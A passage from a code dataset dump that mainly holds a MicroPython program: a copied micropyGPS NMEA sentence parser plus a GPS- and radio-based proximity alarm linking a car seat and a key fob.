array(initial_density)\r\n if any(density) < 0 : \r\n raise ValueError(\"Densites must be *non-negative*.\")\r\n if density.dtype.kind != 'i' :\r\n raise TypeError(\"Densities must be *integers*.\")\r\n if density.ndim != 1 :\r\n raise TypeError(\"Density must be *1D* array.\")\r\n if sum(density) == 0 :\r\n raise ValueError(\"Density can't be empty.\")\r\n if len(density) < 2 :\r\n raise ValueError(\"Density must be more than one site\")\r\n for i in range(self.itermax) :\r\n\r\n new_density = self.move_particle_randomly(density)\r\n\r\n if self.accept_move( energy, density, new_density) :\r\n density = new_density\r\n return density","sub_path":"monte_carlo_step.py","file_name":"monte_carlo_step.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"571433053","text":"# main.py -- put your code here!\n\n\"\"\"\n\nMICROPYTHON CLASS MODULE CODE\nTaken from https://github.com/inmcm/micropyGPS/blob/master/micropyGPS.py\n\n\"\"\"\n\nfrom math import floor, modf, sin, cos, asin, pi, sqrt, radians\n\n# Assume running on MicroPython\nimport utime\n\nimport time\nimport _thread\n\nclass MicropyGPS(object):\n \"\"\"GPS NMEA Sentence Parser. Creates object that stores all relevant GPS data and statistics.\n Parses sentences one character at a time using update(). \"\"\"\n\n # Max Number of Characters a valid sentence can be (based on GGA sentence)\n SENTENCE_LIMIT = 90\n __HEMISPHERES = ('N', 'S', 'E', 'W')\n __NO_FIX = 1\n __FIX_2D = 2\n __FIX_3D = 3\n __DIRECTIONS = ('N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S', 'SSW', 'SW', 'WSW', 'W',\n 'WNW', 'NW', 'NNW')\n __MONTHS = ('January', 'February', 'March', 'April', 'May',\n 'June', 'July', 'August', 'September', 'October',\n 'November', 'December')\n\n def __init__(self, local_offset=0, location_formatting='ddm'):\n \"\"\"\n Setup GPS Object Status Flags, Internal Data Registers, etc\n local_offset (int): Timzone Difference to UTC\n location_formatting (str): Style For Presenting Longitude/Latitude:\n Decimal Degree Minute (ddm) - 40° 26.767′ N\n Degrees Minutes Seconds (dms) - 40° 26′ 46″ N\n Decimal Degrees (dd) - 40.446° N\n \"\"\"\n\n #####################\n # Object Status Flags\n self.sentence_active = False\n self.active_segment = 0\n self.process_crc = False\n self.gps_segments = []\n self.crc_xor = 0\n self.char_count = 0\n self.fix_time = 0\n\n #####################\n # Sentence Statistics\n self.crc_fails = 0\n self.clean_sentences = 0\n self.parsed_sentences = 0\n\n #####################\n # Logging Related\n self.log_handle = None\n self.log_en = False\n\n #####################\n # Data From Sentences\n # Time\n self.timestamp = [0, 0, 0]\n self.date = [0, 0, 0]\n self.local_offset = local_offset\n\n # Position/Motion\n self._latitude = [0, 0.0, 'N']\n self._longitude = [0, 0.0, 'W']\n self.coord_format = location_formatting\n self.speed = [0.0, 0.0, 0.0]\n self.course = 0.0\n self.altitude = 0.0\n self.geoid_height = 0.0\n\n # GPS Info\n self.satellites_in_view = 0\n self.satellites_in_use = 0\n self.satellites_used = []\n self.last_sv_sentence = 0\n self.total_sv_sentences = 0\n self.satellite_data = dict()\n self.hdop = 0.0\n self.pdop = 0.0\n self.vdop = 0.0\n self.valid = False\n self.fix_stat = 0\n self.fix_type = 1\n\n ########################################\n # Coordinates Translation Functions\n ########################################\n @property\n def latitude(self):\n \"\"\"Format Latitude Data Correctly\"\"\"\n if self.coord_format == 'dd':\n decimal_degrees = self._latitude[0] + (self._latitude[1] / 60)\n return [decimal_degrees, self._latitude[2]]\n elif self.coord_format == 'dms':\n minute_parts = modf(self._latitude[1])\n seconds = round(minute_parts[0] * 60)\n return [self._latitude[0], int(minute_parts[1]), seconds, self._latitude[2]]\n else:\n return self._latitude\n\n @property\n def longitude(self):\n \"\"\"Format Longitude Data Correctly\"\"\"\n if self.coord_format == 'dd':\n decimal_degrees = self._longitude[0] + (self._longitude[1] / 60)\n return [decimal_degrees, self._longitude[2]]\n elif self.coord_format == 'dms':\n minute_parts = modf(self._longitude[1])\n seconds = round(minute_parts[0] * 60)\n return [self._longitude[0], int(minute_parts[1]), seconds, self._longitude[2]]\n else:\n return self._longitude\n\n ########################################\n # Logging Related Functions\n ########################################\n def start_logging(self, target_file, mode=\"append\"):\n \"\"\"\n Create GPS data log object\n \"\"\"\n # Set Write Mode Overwrite or Append\n mode_code = 'w' if mode == 'new' else 'a'\n\n try:\n self.log_handle = open(target_file, mode_code)\n except AttributeError:\n print(\"Invalid FileName\")\n return False\n\n self.log_en = True\n return True\n\n def stop_logging(self):\n \"\"\"\n Closes the log file handler and disables further logging\n \"\"\"\n try:\n self.log_handle.close()\n except AttributeError:\n print(\"Invalid Handle\")\n return False\n\n self.log_en = False\n return True\n\n def write_log(self, log_string):\n \"\"\"Attempts to write the last valid NMEA sentence character to the active file handler\n \"\"\"\n try:\n self.log_handle.write(log_string)\n except TypeError:\n return False\n return True\n\n ########################################\n # Sentence Parsers\n ########################################\n def gprmc(self):\n \"\"\"Parse Recommended Minimum Specific GPS/Transit data (RMC)Sentence.\n Updates UTC timestamp, latitude, longitude, Course, Speed, Date, and fix status\n \"\"\"\n\n # UTC Timestamp\n try:\n utc_string = self.gps_segments[1]\n\n if utc_string: # Possible timestamp found\n hours = (int(utc_string[0:2]) + self.local_offset) % 24\n minutes = int(utc_string[2:4])\n seconds = float(utc_string[4:])\n self.timestamp = (hours, minutes, seconds)\n else: # No Time stamp yet\n self.timestamp = (0, 0, 0)\n\n except ValueError: # Bad Timestamp value present\n return False\n\n # Date stamp\n try:\n date_string = self.gps_segments[9]\n\n # Date string printer function assumes to be year >=2000,\n # date_string() must be supplied with the correct century argument to display correctly\n if date_string: # Possible date stamp found\n day = int(date_string[0:2])\n month = int(date_string[2:4])\n year = int(date_string[4:6])\n self.date = (day, month, year)\n else: # No Date stamp yet\n self.date = (0, 0, 0)\n\n except ValueError: # Bad Date stamp value present\n return False\n\n # Check Receiver Data Valid Flag\n if self.gps_segments[2] == 'A': # Data from Receiver is Valid/Has Fix\n\n # Longitude / Latitude\n try:\n # Latitude\n l_string = self.gps_segments[3]\n lat_degs = int(l_string[0:2])\n lat_mins = float(l_string[2:])\n lat_hemi = self.gps_segments[4]\n\n # Longitude\n l_string = self.gps_segments[5]\n lon_degs = int(l_string[0:3])\n lon_mins = float(l_string[3:])\n lon_hemi = self.gps_segments[6]\n except ValueError:\n return False\n\n if lat_hemi not in self.__HEMISPHERES:\n return False\n\n if lon_hemi not in self.__HEMISPHERES:\n return False\n\n # Speed\n try:\n spd_knt = float(self.gps_segments[7])\n except ValueError:\n return False\n\n # Course\n try:\n if self.gps_segments[8]:\n course = float(self.gps_segments[8])\n else:\n course = 0.0\n except ValueError:\n return False\n\n # TODO - Add Magnetic Variation\n\n # Update Object Data\n self._latitude = [lat_degs, lat_mins, lat_hemi]\n self._longitude = [lon_degs, lon_mins, lon_hemi]\n # Include mph and hm/h\n self.speed = [spd_knt, spd_knt * 1.151, spd_knt * 1.852]\n self.course = course\n self.valid = True\n\n # Update Last Fix Time\n self.new_fix_time()\n\n else: # Clear Position Data if Sentence is 'Invalid'\n self._latitude = [0, 0.0, 'N']\n self._longitude = [0, 0.0, 'W']\n self.speed = [0.0, 0.0, 0.0]\n self.course = 0.0\n self.valid = False\n\n return True\n\n def gpgll(self):\n \"\"\"Parse Geographic Latitude and Longitude (GLL)Sentence. Updates UTC timestamp, latitude,\n longitude, and fix status\"\"\"\n\n # UTC Timestamp\n try:\n utc_string = self.gps_segments[5]\n\n if utc_string: # Possible timestamp found\n hours = (int(utc_string[0:2]) + self.local_offset) % 24\n minutes = int(utc_string[2:4])\n seconds = float(utc_string[4:])\n self.timestamp = (hours, minutes, seconds)\n else: # No Time stamp yet\n self.timestamp = (0, 0, 0)\n\n except ValueError: # Bad Timestamp value present\n return False\n\n # Check Receiver Data Valid Flag\n if self.gps_segments[6] == 'A': # Data from Receiver is Valid/Has Fix\n\n # Longitude / Latitude\n try:\n # Latitude\n l_string = self.gps_segments[1]\n lat_degs = int(l_string[0:2])\n lat_mins = float(l_string[2:])\n lat_hemi = self.gps_segments[2]\n\n # Longitude\n l_string = self.gps_segments[3]\n lon_degs = int(l_string[0:3])\n lon_mins = float(l_string[3:])\n lon_hemi = self.gps_segments[4]\n except ValueError:\n return False\n\n if lat_hemi not in self.__HEMISPHERES:\n return False\n\n if lon_hemi not in self.__HEMISPHERES:\n return False\n\n # Update Object Data\n self._latitude = [lat_degs, lat_mins, lat_hemi]\n self._longitude = [lon_degs, lon_mins, lon_hemi]\n self.valid = True\n\n # Update Last Fix Time\n self.new_fix_time()\n\n else: # Clear Position Data if Sentence is 'Invalid'\n self._latitude = [0, 0.0, 'N']\n self._longitude = [0, 0.0, 'W']\n self.valid = False\n\n return True\n\n def gpvtg(self):\n \"\"\"Parse Track Made Good and Ground Speed (VTG) Sentence. Updates speed and course\"\"\"\n try:\n course = float(self.gps_segments[1])\n spd_knt = float(self.gps_segments[5])\n except ValueError:\n return False\n\n # Include mph and km/h\n self.speed = (spd_knt, spd_knt * 1.151, spd_knt * 1.852)\n self.course = course\n return True\n\n def gpgga(self):\n \"\"\"Parse Global Positioning System Fix Data (GGA) Sentence. Updates UTC timestamp, latitude, longitude,\n fix status, satellites in use, Horizontal Dilution of Precision (HDOP), altitude, geoid height and fix status\"\"\"\n\n try:\n # UTC Timestamp\n utc_string = self.gps_segments[1]\n\n # Skip timestamp if receiver doesn't have on yet\n if utc_string:\n hours = (int(utc_string[0:2]) + self.local_offset) % 24\n minutes = int(utc_string[2:4])\n seconds = float(utc_string[4:])\n else:\n hours = 0\n minutes = 0\n seconds = 0.0\n\n # Number of Satellites in Use\n satellites_in_use = int(self.gps_segments[7])\n\n # Get Fix Status\n fix_stat = int(self.gps_segments[6])\n\n except (ValueError, IndexError):\n return False\n\n try:\n # Horizontal Dilution of Precision\n hdop = float(self.gps_segments[8])\n except (ValueError, IndexError):\n hdop = 0.0\n\n # Process Location and Speed Data if Fix is GOOD\n if fix_stat:\n\n # Longitude / Latitude\n try:\n # Latitude\n l_string = self.gps_segments[2]\n lat_degs = int(l_string[0:2])\n lat_mins = float(l_string[2:])\n lat_hemi = self.gps_segments[3]\n\n # Longitude\n l_string = self.gps_segments[4]\n lon_degs = int(l_string[0:3])\n lon_mins = float(l_string[3:])\n lon_hemi = self.gps_segments[5]\n except ValueError:\n return False\n\n if lat_hemi not in self.__HEMISPHERES:\n return False\n\n if lon_hemi not in self.__HEMISPHERES:\n return False\n\n # Altitude / Height Above Geoid\n try:\n altitude = float(self.gps_segments[9])\n geoid_height = float(self.gps_segments[11])\n except ValueError:\n altitude = 0\n geoid_height = 0\n\n # Update Object Data\n self._latitude = [lat_degs, lat_mins, lat_hemi]\n self._longitude = [lon_degs, lon_mins, lon_hemi]\n self.altitude = altitude\n self.geoid_height = geoid_height\n\n # Update Object Data\n self.timestamp = [hours, minutes, seconds]\n self.satellites_in_use = satellites_in_use\n self.hdop = hdop\n self.fix_stat = fix_stat\n\n # If Fix is GOOD, update fix timestamp\n if fix_stat:\n self.new_fix_time()\n\n return True\n\n def gpgsa(self):\n \"\"\"Parse GNSS DOP and Active Satellites (GSA) sentence. Updates GPS fix type, list of satellites used in\n fix calculation, Position Dilution of Precision (PDOP), Horizontal Dilution of Precision (HDOP), Vertical\n Dilution of Precision, and fix status\"\"\"\n\n # Fix Type (None,2D or 3D)\n try:\n fix_type = int(self.gps_segments[2])\n except ValueError:\n return False\n\n # Read All (up to 12) Available PRN Satellite Numbers\n sats_used = []\n for sats in range(12):\n sat_number_str = self.gps_segments[3 + sats]\n if sat_number_str:\n try:\n sat_number = int(sat_number_str)\n sats_used.append(sat_number)\n except ValueError:\n return False\n else:\n break\n\n # PDOP,HDOP,VDOP\n try:\n pdop = float(self.gps_segments[15])\n hdop = float(self.gps_segments[16])\n vdop = float(self.gps_segments[17])\n except ValueError:\n return False\n\n # Update Object Data\n self.fix_type = fix_type\n\n # If Fix is GOOD, update fix timestamp\n if fix_type > self.__NO_FIX:\n self.new_fix_time()\n\n self.satellites_used = sats_used\n self.hdop = hdop\n self.vdop = vdop\n self.pdop = pdop\n\n return True\n\n def gpgsv(self):\n \"\"\"Parse Satellites in View (GSV) sentence. Updates number of SV Sentences,the number of the last SV sentence\n parsed, and data on each satellite present in the sentence\"\"\"\n try:\n num_sv_sentences = int(self.gps_segments[1])\n current_sv_sentence = int(self.gps_segments[2])\n sats_in_view = int(self.gps_segments[3])\n except ValueError:\n return False\n\n # Create a blank dict to store all the satellite data from this sentence in:\n # satellite PRN is key, tuple containing telemetry is value\n satellite_dict = dict()\n\n # Calculate Number of Satelites to pull data for and thus how many segment positions to read\n if num_sv_sentences == current_sv_sentence:\n # Last sentence may have 1-4 satellites; 5 - 20 positions\n sat_segment_limit = (sats_in_view - ((num_sv_sentences - 1) * 4)) * 5\n else:\n sat_segment_limit = 20 # Non-last sentences have 4 satellites and thus read up to position 20\n\n # Try to recover data for up to 4 satellites in sentence\n for sats in range(4, sat_segment_limit, 4):\n\n # If a PRN is present, grab satellite data\n if self.gps_segments[sats]:\n try:\n sat_id = int(self.gps_segments[sats])\n except (ValueError,IndexError):\n return False\n\n try: # elevation can be null (no value) when not tracking\n elevation = int(self.gps_segments[sats+1])\n except (ValueError,IndexError):\n elevation = None\n\n try: # azimuth can be null (no value) when not tracking\n azimuth = int(self.gps_segments[sats+2])\n except (ValueError,IndexError):\n azimuth = None\n\n try: # SNR can be null (no value) when not tracking\n snr = int(self.gps_segments[sats+3])\n except (ValueError,IndexError):\n snr = None\n # If no PRN is found, then the sentence has no more satellites to read\n else:\n break\n\n # Add Satellite Data to Sentence Dict\n satellite_dict[sat_id] = (elevation, azimuth, snr)\n\n # Update Object Data\n self.total_sv_sentences = num_sv_sentences\n self.last_sv_sentence = current_sv_sentence\n self.satellites_in_view = sats_in_view\n\n # For a new set of sentences, we either clear out the existing sat data or\n # update it as additional SV sentences are parsed\n if current_sv_sentence == 1:\n self.satellite_data = satellite_dict\n else:\n self.satellite_data.update(satellite_dict)\n\n return True\n\n ##########################################\n # Data Stream Handler Functions\n ##########################################\n\n def new_sentence(self):\n \"\"\"Adjust Object Flags in Preparation for a New Sentence\"\"\"\n self.gps_segments = ['']\n self.active_segment = 0\n self.crc_xor = 0\n self.sentence_active = True\n self.process_crc = True\n self.char_count = 0\n\n def update(self, new_char):\n \"\"\"Process a new input char and updates GPS object if necessary based on special characters ('$', ',', '*')\n Function builds a list of received string that are validate by CRC prior to parsing by the appropriate\n sentence function. Returns sentence type on successful parse, None otherwise\"\"\"\n\n valid_sentence = False\n\n # Validate new_char is a printable char\n ascii_char = ord(new_char)\n\n if 10 <= ascii_char <= 126:\n self.char_count += 1\n\n # Write Character to log file if enabled\n if self.log_en:\n self.write_log(new_char)\n\n # Check if a new string is starting ($)\n if new_char == '$':\n self.new_sentence()\n return None\n\n elif self.sentence_active:\n\n # Check if sentence is ending (*)\n if new_char == '*':\n self.process_crc = False\n self.active_segment += 1\n self.gps_segments.append('')\n return None\n\n # Check if a section is ended (,), Create a new substring to feed\n # characters to\n elif new_char == ',':\n self.active_segment += 1\n self.gps_segments.append('')\n\n # Store All Other printable character and check CRC when ready\n else:\n self.gps_segments[self.active_segment] += new_char\n\n # When CRC input is disabled, sentence is nearly complete\n if not self.process_crc:\n\n if len(self.gps_segments[self.active_segment]) == 2:\n try:\n final_crc = int(self.gps_segments[self.active_segment], 16)\n if self.crc_xor == final_crc:\n valid_sentence = True\n else:\n self.crc_fails += 1\n except ValueError:\n pass # CRC Value was deformed and could not have been correct\n\n # Update CRC\n if self.process_crc:\n self.crc_xor ^= ascii_char\n\n # If a Valid Sentence Was received and it's a supported sentence, then parse it!!\n if valid_sentence:\n self.clean_sentences += 1 # Increment clean sentences received\n self.sentence_active = False # Clear Active Processing Flag\n\n if self.gps_segments[0] in self.supported_sentences:\n\n # parse the Sentence Based on the message type, return True if parse is clean\n if self.supported_sentences[self.gps_segments[0]](self):\n\n # Let host know that the GPS object was updated by returning parsed sentence type\n self.parsed_sentences += 1\n return self.gps_segments[0]\n\n # Check that the sentence buffer isn't filling up with Garage waiting for the sentence to complete\n if self.char_count > self.SENTENCE_LIMIT:\n self.sentence_active = False\n\n # Tell Host no new sentence was parsed\n return None\n\n def new_fix_time(self):\n \"\"\"Updates a high resolution counter with current time when fix is updated. Currently only triggered from\n GGA, GSA and RMC sentences\"\"\"\n try:\n self.fix_time = utime.ticks_ms()\n except NameError:\n self.fix_time = time.time()\n\n #########################################\n # User Helper Functions\n # These functions make working with the GPS object data easier\n #########################################\n\n def satellite_data_updated(self):\n \"\"\"\n Checks if the all the GSV sentences in a group have been read, making satellite data complete\n :return: boolean\n \"\"\"\n if self.total_sv_sentences > 0 and self.total_sv_sentences == self.last_sv_sentence:\n return True\n else:\n return False\n\n def satellites_visible(self):\n \"\"\"\n Returns a list of of the satellite PRNs currently visible to the receiver\n :return: list\n \"\"\"\n return list(self.satellite_data.keys())\n\n def time_since_fix(self):\n \"\"\"Returns number of millisecond since the last sentence with a valid fix was parsed. Returns 0 if\n no fix has been found\"\"\"\n\n # Test if a Fix has been found\n if self.fix_time == 0:\n return -1\n\n # Try calculating fix time using utime; if not running MicroPython\n # time.time() returns a floating point value in secs\n try:\n current = utime.ticks_diff(utime.ticks_ms(), self.fix_time)\n except NameError:\n current = (time.time() - self.fix_time) * 1000 # ms\n\n return current\n\n def compass_direction(self):\n \"\"\"\n Determine a cardinal or inter-cardinal direction based on current course.\n :return: string\n \"\"\"\n # Calculate the offset for a rotated compass\n if self.course >= 348.75:\n offset_course = 360 - self.course\n else:\n offset_course = self.course + 11.25\n\n # Each compass point is separated by 22.5 degrees, divide to find lookup value\n dir_index = floor(offset_course / 22.5)\n\n final_dir = self.__DIRECTIONS[dir_index]\n\n return final_dir\n\n def latitude_string(self):\n \"\"\"\n Create a readable string of the current latitude data\n :return: string\n \"\"\"\n if self.coord_format == 'dd':\n formatted_latitude = self.latitude\n lat_string = str(formatted_latitude[0]) + '° ' + str(self._latitude[2])\n elif self.coord_format == 'dms':\n formatted_latitude = self.latitude\n lat_string = str(formatted_latitude[0]) + '° ' + str(formatted_latitude[1]) + \"' \" + str(formatted_latitude[2]) + '\" ' + str(formatted_latitude[3])\n else:\n lat_string = str(self._latitude[0]) + '° ' + str(self._latitude[1]) + \"' \" + str(self._latitude[2])\n return lat_string\n\n def longitude_string(self):\n \"\"\"\n Create a readable string of the current longitude data\n :return: string\n \"\"\"\n if self.coord_format == 'dd':\n formatted_longitude = self.longitude\n lon_string = str(formatted_longitude[0]) + '° ' + str(self._longitude[2])\n elif self.coord_format == 'dms':\n formatted_longitude = self.longitude\n lon_string = str(formatted_longitude[0]) + '° ' + str(formatted_longitude[1]) + \"' \" + str(formatted_longitude[2]) + '\" ' + str(formatted_longitude[3])\n else:\n lon_string = str(self._longitude[0]) + '° ' + str(self._longitude[1]) + \"' \" + str(self._longitude[2])\n return lon_string\n\n def speed_string(self, unit='kph'):\n \"\"\"\n Creates a readable string of the current speed data in one of three units\n :param unit: string of 'kph','mph, or 'knot'\n :return:\n \"\"\"\n if unit == 'mph':\n speed_string = str(self.speed[1]) + ' mph'\n\n elif unit == 'knot':\n if self.speed[0] == 1:\n unit_str = ' knot'\n else:\n unit_str = ' knots'\n speed_string = str(self.speed[0]) + unit_str\n\n else:\n speed_string = str(self.speed[2]) + ' km/h'\n\n return speed_string\n\n def date_string(self, formatting='s_mdy', century='20'):\n \"\"\"\n Creates a readable string of the current date.\n Can select between long format: Januray 1st, 2014\n or two short formats:\n 11/01/2014 (MM/DD/YYYY)\n 01/11/2014 (DD/MM/YYYY)\n :param formatting: string 's_mdy', 's_dmy', or 'long'\n :param century: int delineating the century the GPS data is from (19 for 19XX, 20 for 20XX)\n :return: date_string string with long or short format date\n \"\"\"\n\n # Long Format Januray 1st, 2014\n if formatting == 'long':\n # Retrieve Month string from private set\n month = self.__MONTHS[self.date[1] - 1]\n\n # Determine Date Suffix\n if self.date[0] in (1, 21, 31):\n suffix = 'st'\n elif self.date[0] in (2, 22):\n suffix = 'nd'\n elif self.date[0] == (3, 23):\n suffix = 'rd'\n else:\n suffix = 'th'\n\n day = str(self.date[0]) + suffix # Create Day String\n\n year = century + str(self.date[2]) # Create Year String\n\n date_string = month + ' ' + day + ', ' + year # Put it all together\n\n else:\n # Add leading zeros to day string if necessary\n if self.date[0] < 10:\n day = '0' + str(self.date[0])\n else:\n day = str(self.date[0])\n\n # Add leading zeros to month string if necessary\n if self.date[1] < 10:\n month = '0' + str(self.date[1])\n else:\n month = str(self.date[1])\n\n # Add leading zeros to year string if necessary\n if self.date[2] < 10:\n year = '0' + str(self.date[2])\n else:\n year = str(self.date[2])\n\n # Build final string based on desired formatting\n if formatting == 's_dmy':\n date_string = day + '/' + month + '/' + year\n\n else: # Default date format\n date_string = month + '/' + day + '/' + year\n\n return date_string\n\n # All the currently supported NMEA sentences\n supported_sentences = {'GPRMC': gprmc, 'GLRMC': gprmc,\n 'GPGGA': gpgga, 'GLGGA': gpgga,\n 'GPVTG': gpvtg, 'GLVTG': gpvtg,\n 'GPGSA': gpgsa, 'GLGSA': gpgsa,\n 'GPGSV': gpgsv, 'GLGSV': gpgsv,\n 'GPGLL': gpgll, 'GLGLL': gpgll,\n 'GNGGA': gpgga, 'GNRMC': gprmc,\n 'GNVTG': gpvtg, 'GNGLL': gpgll,\n 'GNGSA': gpgsa,\n }\n\n\n\"\"\"\n\nMICROPYTHON CLASS MODULE CODE\nTaken from https://github.com/inmcm/micropyGPS/blob/master/micropyGPS.py\n\n\"\"\"\n\nclass Subsystem(object):\n def __init__(self, subsystem_type, power_estimator_adc_pin_name, power_estimator_adc_gpio_pin_name, telemetry_module_uart_pin_number, gps_module_uart_number, vibration_motor_pin_name, buzzer_pin_name):\n self.subsystem_type = subsystem_type\n self.power_estimator = Subsystem.PowerEstimator(adc_pin_name=power_estimator_adc_pin_name, gpio_pin_name=power_estimator_adc_gpio_pin_name)\n self.telemetry_module = Subsystem.TelemetryModule(uart_number=telemetry_module_uart_pin_number)\n self.gps_module = Subsystem.GPS_Module(uart_number=gps_module_uart_number)\n self.buzzer_pin = pyb.Pin(buzzer_pin_name, pyb.Pin.OUT_PP)\n self.vibration_motor_pin = pyb.Pin(vibration_motor_pin_name, pyb.Pin.OUT_PP)\n self.alarm_ringing = 0\n self.stop_flag = 0\n self.time_since_disarm = 120\n # Set up alarm off button\n pyb.Switch().callback(lambda: self.disarm_alarm())\n\n if self.subsystem_type == 'key_fob':\n self.armed = 0\n elif self.subsystem_type == 'car_seat':\n self.armed = 1\n\n def run(self):\n distance_threshold = 20 # 20 meters\n max_communication_wait_time = 15 # max communication wait time is 15 seconds\n rearm_time = 120 # rearm in 2 minutes after disarming\n percent_power_remaining = self.power_estimator.get_power_estimate()\n percent_power_remaining_threshold = 75\n\n if self.subsystem_type == 'key_fob':\n _thread.start_new_thread( update_gps_thread, (\"Update GPS Location Thread\", self, 0.1) )\n _thread.start_new_thread( telemetry_listen_thread, (\"Telemetry Listen Thread\", self, 0.1) )\n elif self.subsystem_type == 'car_seat':\n _thread.start_new_thread( update_gps_thread, (\"Update GPS Location Thread\", self, 0.1) )\n _thread.start_new_thread( transmit_location_thread, (\"Transmit Location Thread\", self, 0.2) )\n\n while True:\n if self.subsystem_type == \"key_fob\":\n # While there is enough power\n while percent_power_remaining > percent_power_remaining_threshold:\n print(self.subsystem_type, \" is running. Current location\", self.gps_module.get_location())\n print(\"percent_power_remaining\", percent_power_remaining)\n\n if self.telemetry_module.time_since_last_message < max_communication_wait_time:\n # Calculate the distance between subsystems\n distance_between_subsystems = self.calculate_distance_between_subsystems()\n\n # If alarm is armed\n if self.armed:\n # If distance is greater than threshold\n if distance_between_subsystems > distance_threshold:\n # Sound alarm\n self.sound_alarm()\n else:\n # Ensure alarm is quiet\n self.quiet_alarm()\n # If it has been too long since a message\n else:\n # And alarm is armed. Sound alarm.\n if self.armed:\n self.sound_alarm()\n # Else alarm is not armed, ensure it is quiet.\n else:\n self.quiet_alarm()\n\n if self.telemetry_module.last_armed:\n if self.time_since_disarm < rearm_time:\n self.armed = 0\n else:\n self.armed = 1\n\n # Get updated power estimate.\n percent_power_remaining = self.power_estimator.get_power_estimate()\n\n time.sleep(1)\n self.time_since_disarm += 1\n elif self.subsystem_type == 'car_seat':\n # While there is enough power\n while percent_power_remaining > percent_power_remaining_threshold:\n # Get updated power estimate.\n percent_power_remaining = self.power_estimator.get_power_estimate()\n\n time.sleep(5)\n\n pyb.LED(1).on()\n self.stop_flag = 1\n\n buzz = 1\n while percent_power_remaining <= percent_power_remaining_threshold:\n print(\"Power is low running on reserves | percent_power_remaining =\", percent_power_remaining, \"|\")\n percent_power_remaining = self.power_estimator.get_power_estimate()\n pyb.LED(1).toggle()\n if buzz:\n self.buzzer_pin.high()\n buzz = 0\n else:\n self.buzzer_pin.low()\n buzz = 1\n time.sleep(1)\n pyb.LED(1).off()\n self.stop_flag = 0\n\n def sound_alarm(self):\n if self.alarm_ringing:\n self.buzzer_pin.high()\n self.vibration_motor_pin.high()\n self.alarm_ringing = 0\n else:\n self.buzzer_pin.low()\n self.vibration_motor_pin.low()\n self.alarm_ringing = 1\n\n def quiet_alarm(self):\n self.buzzer_pin.low()\n self.vibration_motor_pin.low()\n\n def disarm_alarm(self):\n self.armed = 0\n self.time_since_disarm = 0\n self.quiet_alarm()\n\n def calculate_distance_between_subsystems(self):\n my_latitude, my_longitude = self.gps_module.get_location()\n other_latitude = self.telemetry_module.last_latitude\n other_longitude = self.telemetry_module.last_longitude\n\n if my_latitude == 0 or my_longitude == 0 or other_latitude == 0 or other_longitude == 0:\n return 0\n else:\n R = 6372.8 # Earth radius in kilometers\n\n dLat = radians(other_latitude - my_latitude)\n print(\"dLat\", dLat)\n dLon = radians(other_longitude - my_longitude)\n print(\"dLon\", dLon)\n lat1 = radians(my_latitude)\n lat2 = radians(other_latitude)\n\n a = sin(dLat / 2)**2 + cos(lat1) * cos(lat2) * sin(dLon / 2)**2\n c = 2 * asin(sqrt(a))\n\n return R * c * 1000\n\n class PowerEstimator(object):\n def __init__(self, adc_pin_name, gpio_pin_name):\n self.adc_pin = pyb.ADC(pyb.Pin(adc_pin_name))\n self.gpio_pin = pyb.Pin(gpio_pin_name)\n self.starting_counts = None\n self.percent_power_remaining = None\n\n def get_power_estimate(self):\n self.gpio_pin.high()\n\n adc_counts = self.adc_pin.read()\n\n self.gpio_pin.low()\n\n if self.starting_counts is None:\n if adc_counts == 0:\n self.starting_counts = 1\n else:\n self.starting_counts = adc_counts\n self.percent_power_remaining = 100.0\n else:\n self.percent_power_remaining = adc_counts / self.starting_counts * 100\n\n return self.percent_power_remaining\n\n class TelemetryModule(object):\n def __init__(self, uart_number):\n self.uart = pyb.UART(uart_number, 9600)\n self.last_longitude = 0\n self.last_latitude = 0\n self.time_since_disarm = 300\n self.time_since_last_message = 15\n self.last_armed = 0\n\n def send_message(self, message):\n self.uart.write(message)\n\n @staticmethod\n def decode_message(message):\n message = message.split(\",\")\n\n armed = int(message[0][1:])\n latitude = float(message[1])\n longitude = float(message[2][:-2])\n\n return armed, latitude, longitude\n\n class GPS_Module(object):\n def __init__(self, uart_number):\n self.uart = pyb.UART(uart_number, 9600)\n self.gps = MicropyGPS()\n\n def get_location(self):\n return (Subsystem.GPS_Module.convert_coordinate_to_decimal(self.gps.latitude), Subsystem.GPS_Module.convert_coordinate_to_decimal(self.gps.longitude))\n\n @staticmethod\n def convert_coordinate_to_decimal(coordinate_list):\n degrees = float(coordinate_list[0])\n minutes = float(coordinate_list[1])\n return degrees + minutes / 60\n\ndef telemetry_listen_thread(threadName, subsystem, delay):\n print(\"Starting thread %TL% \", threadName)\n\n while True:\n while not subsystem.stop_flag:\n if subsystem.telemetry_module.uart.any():\n try:\n data_line = subsystem.telemetry_module.uart.readline().decode('ascii')\n except UnicodeError:\n data_line = \"\"\n if len(data_line) > 10:\n if data_line[0] == '(' and data_line[-2] == ')':\n try:\n armed_state, subsystem.telemetry_module.last_latitude, subsystem.telemetry_module.last_longitude = subsystem.TelemetryModule.decode_message(data_line)\n subsystem.telemetry_module.last_armed = armed_state\n print(\"%TL% *Message decoded* |armed_state: \" + str(armed_state) + \" |longitude: \" + str(subsystem.telemetry_module.last_longitude) + \" |latitude: \" + str(subsystem.telemetry_module.last_latitude) + \" |\")\n subsystem.telemetry_module.time_since_last_message = 0\n\n if not armed_state:\n subsystem.armed = 0\n subsystem.telemetry_module.time_since_disarm = 0\n else:\n subsystem.armed = 1\n subsystem.telemetry_module.time_since_disarm += delay\n time.sleep(delay)\n except ValueError:\n subsystem.telemetry_module.time_since_last_message += delay\n subsystem.telemetry_module.time_since_disarm += delay\n time.sleep(delay)\n else:\n subsystem.telemetry_module.time_since_last_message += delay\n subsystem.telemetry_module.time_since_disarm += delay\n time.sleep(delay)\n print(\"%TL% Time since last message: \", subsystem.telemetry_module.time_since_last_message)\n print(\"%TL% Time since last disarm transmission: \", subsystem.telemetry_module.time_since_disarm)\n if subsystem.telemetry_module.time_since_last_message > 1900:\n subsystem.telemetry_module.time_since_last_message /= 2\n if subsystem.telemetry_module.time_since_disarm > 1900:\n subsystem.telemetry_module.time_since_disarm /= 2\n time.sleep(delay)\n\ndef update_gps_thread(threadName, subsystem, delay):\n print(\"%G% Starting thread \", threadName)\n\n while True:\n while not subsystem.stop_flag:\n if subsystem.gps_module.uart.any():\n subsystem.gps_module.gps.update(chr(subsystem.gps_module.uart.readchar()))\n else:\n time.sleep(delay)\n time.sleep(delay)\n\ndef transmit_location_thread(threadName, subsystem, delay):\n print(\"%TT% Starting thread \", 